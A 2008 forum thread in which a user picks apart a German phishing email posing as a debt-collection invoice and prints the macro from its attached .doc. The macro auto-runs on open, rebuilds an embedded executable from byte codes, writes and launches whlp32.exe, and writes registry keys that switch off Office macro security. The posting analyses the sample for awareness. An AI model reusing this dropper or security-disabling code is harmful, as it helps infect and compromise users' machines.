malware mail: How stupid do they think I am?

Post by **^rooker** » Tue Sep 09, 2008 2:22 pm

Today I've received an email that had SPAM/Malware written all over it:

Sehr geehrte Damen und Herren!
Die Anzahlung 447043870189 ist erfolgt
Es wurden 9620.00 EURO von Ihrem Konto abgebucht.
Die Auflistung der Kosten finden Sie im Anhang

Zyklop Inkasso Deutschland GmbH
KÃ¶nigsberger Str. 10
D-47809 Krefeld

GeschÃ¤ftsfÃ¼hrer: Lothar Hilse, Gerhard Liebchen
Handelsregister: Amtsgericht Krefeld HRB 35 89
AufsichtsbehÃ¶rde: LandgerichtsprÃ¤sident Krefeld
USt-IdNr.: DE 120 154 439

Now, come ooooon.... that's ridiculous. So what's the message of that mail? It's probably the attachment: rechnung.zip, containing something even more suspicious: rechnung.doc

I hate getting .doc files per mail in general! That file is even 289.280 Bytes in size. So what's in it? A macro - of course:

Post by **^rooker** » Tue Sep 09, 2008 2:27 pm

Code: Select all

Rem Attribute VBA_ModuleType=VBADocumentModule
Sub ThisDocument
Rem Const iSymbols = 45297
Rem Const iBlockCount = 158
Rem Dim b(1 To 158) As String
Rem 
Rem Private Sub Shellcode()
Rem b(1) = "77|90|144|0|1|0|0|0|4|0|16|0|255|255|0|0|184|0|0|0|0|0|0|0|64|0|0|0|0|0|..."
Rem End Sub
Rem 
Rem Private Sub MyMessage()
Rem End Sub
Rem 
Rem 
Rem Private Sub Loader()
Rem Dim dumpfile As String: Dim exefile As String
Rem Dim i As Long
Rem Call Shellcode
Rem  For i = 1 To iBlockCount
Rem   dumpfile = dumpfile & b(i)
Rem  Next i
Rem Dim parsearr() As String: parsearr = Split(dumpfile, "|", -1, vbTextCompare)
Rem  For i = 0 To iSymbols - 1
Rem    exefile = exefile & Chr(parsearr(i))
Rem  Next i
Rem Dim NameOfLocalFile As String: Dim PathOfWriteDir As String: Dim DatNr As Integer
Rem NameOfLocalFile = "whlp32.exe"
Rem PathOfWriteDir = Environ("USERPROFILE")
Rem ChDrive (PathOfWriteDir): ChDir (PathOfWriteDir): DatNr = FreeFile(): Open NameOfLocalFile For Binary Access Read Write As DatNr
Rem  Put #1, , exefile
Rem Close #1
Rem Shell (NameOfLocalFile)
Rem Call DisableSecurity
Rem Call MyMessage
Rem End Sub
Rem 
Rem Private Sub Document_Open()
Rem Call Loader
Rem End Sub
Rem 
Rem Private Sub DisableSecurity()
Rem Dim objShell: Set objShell = CreateObject("WScript.Shell"): On Error Resume Next
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Excel\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
Rem End Sub
Rem 
Rem 
End Sub

The "Rem"s at the beginning of each line actually disable the whole code - I wonder if that was automatically done by OpenOffice (which I used for opening the file).

The b()="..." is a sequence of ascii codes - according to the number of "0" characters in there it's probably a binary executable.

This is the most bloated, fucked up and insulting "virus" I've ever received... If I wasn't running Linux, I'd probably be scared.

carmofin · Post by **carmofin** » Wed Dec 03, 2008 4:40 pm

http://timesonline.typepad.com/technolo ... -sent.html

Post by **^rooker** » Wed Dec 03, 2008 6:04 pm

400.000 USD??
wow.

Das Werkstatt